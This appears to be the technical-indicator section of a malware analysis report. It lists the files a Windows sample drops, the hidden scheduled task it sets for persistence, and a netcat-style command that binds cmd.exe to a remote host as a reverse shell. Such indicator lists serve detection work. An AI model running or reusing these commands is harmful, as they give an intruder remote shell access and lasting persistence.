Technical Information
- <SYSTEM32>\tasks\qqserver
- %ALLUSERSPROFILE%\qqserver.exe
- %ALLUSERSPROFILE%\ncsrv.exe
- %ALLUSERSPROFILE%\tftp.exe
- '<LOCALNET>.1.109':99
- '<LOCALNET>.1.109':98
- '<LOCALNET>.1.109':97
- ClassName: 'AutoHotkey' WindowName: '<Full path to file>'
- ClassName: 'AutoHotkey' WindowName: '%ALLUSERSPROFILE%\ncsrv.exe'
- '%ALLUSERSPROFILE%\ncsrv.exe'
- '%ALLUSERSPROFILE%\qqserver.exe' -t -e cmd.exe 192.168.1.109 90-99 -d
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn QQserver /tr %ALLUSERSPROFILE%\ncsrv.exe /sc onlogon' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\QQserver.exe -t -e cmd.exe 192.168.1.109 90-99 -d' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn QQserver /tr %ALLUSERSPROFILE%\ncsrv.exe /sc onlogon
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\QQserver.exe -t -e cmd.exe 192.168.1.109 90-99 -d
- '%WINDIR%\syswow64\schtasks.exe' /create /tn QQserver /tr %ALLUSERSPROFILE%\ncsrv.exe /sc onlogon